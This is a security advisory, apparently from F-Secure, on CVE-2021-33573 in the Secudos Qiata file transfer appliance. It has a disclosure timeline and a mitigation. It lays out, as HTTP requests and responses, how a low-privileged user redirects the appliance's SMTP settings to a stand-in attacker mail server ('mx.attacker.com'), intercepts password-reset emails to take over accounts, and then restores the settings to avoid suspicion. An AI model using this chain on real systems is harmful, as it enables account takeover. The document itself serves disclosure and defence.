SECUDOS Qiata FTA mail settings access control vulnerability
-
William Söderberg
- Published: 24 Aug 2021
CVE-2021-33573
Share
Type
Severity
Affected products
Remediation
Credits
2021-04-14 | Notified Secudos about the identified vulnerability |
2021-04-15 | Vendor acknowledged issue |
2021-04-26 | Patch released in version 2.21.0 |
2021-08-24 | F-Secure publishes advisory |
F-Secure identified an access control vulnerability in the Secudos Qiata File Transfer Appliance (FTA). This issue could allow a low privileged attacker to escalate their privileges on the system and gain unauthorized access to files and functionality.
Secudos describes the software as follows: “Qiata File Transfer Appliances (FTAs) provide the ability to easily and securely exchange files with internal or external users. Qiata is a user-friendly solution in the form of a specialized web application that is optimized for the task of file transfer. Qiata is not some service on the internet. Qiata is an appliance solution that operates within the enterprise itself.”
F-Secure found that both low privileged internal and external users could change the SMTP settings of the FTA.
Low privileged users can escalate privileges in the system. By changing the SMTP settings to send e-mails to an attacker controlled server, the attacker can initiate a password reset for a victim user, view the reset e-mail, and subsequently change victim user’s password.
In order to carry out the attack, the attacker must first be authenticated to the system. In a plausible narrative, the attacker might have received a link to a file sent from the FTA, providing an external user session on the Qiata FTA:
GET /cgi-bin/login.fcgi?link=d7d2d6c1-67f1-4f81-839a-73aca4d405b9 HTTP/1.1 Host: 192.168.17.128
The response body contains the “tokenValue” which serves as a session identifier on the FTA:
HTTP/1.1 200 OK Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 X-UA-Compatible: IE=EDGE Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure Set-Cookie: FTAUser=8ddd3e2b-73a4-4949-8173-908e38aa7f19;Path=/;Expires=Thu, 04-Mar-2021 14:46:04 GMT;HttpOnly;Secure X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: master-only Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 12416
POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1 Host: 192.168.17.128 Content-Length: 645 X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19 Content-Type: text/xml Accept: */*
This returns the SMTP settings including the existing SMTP server address (“smtpAddress”) as seen below:
HTTP/1.1 200 OK Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: master-only Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Length: 558 Connection: close Content-Type: text/xml
The SMTP settings are then updated to to send e-mails to an attacker controlled server (“mx.attacker.com”):
POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1 Host: 192.168.17.128 Content-Length: 645 X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19 Content-Type: text/xml Accept: */*
The 200 response code and response body returned confirms that these details have been updated:
HTTP/1.1 200 OK Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: master-only Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Type: text/xml Content-Length: 491
With the server reconfigured, the attacker can now initiate a password reset for a target user, gaining access to their account. Once the attack has concluded, the same attack vector can be used to change back the SMTP settings in order to avoid raising suspicion.
Restricting outbound SMTP traffic from the FTA to the Internet. Only permit SMTP traffic to whitelisted destinations.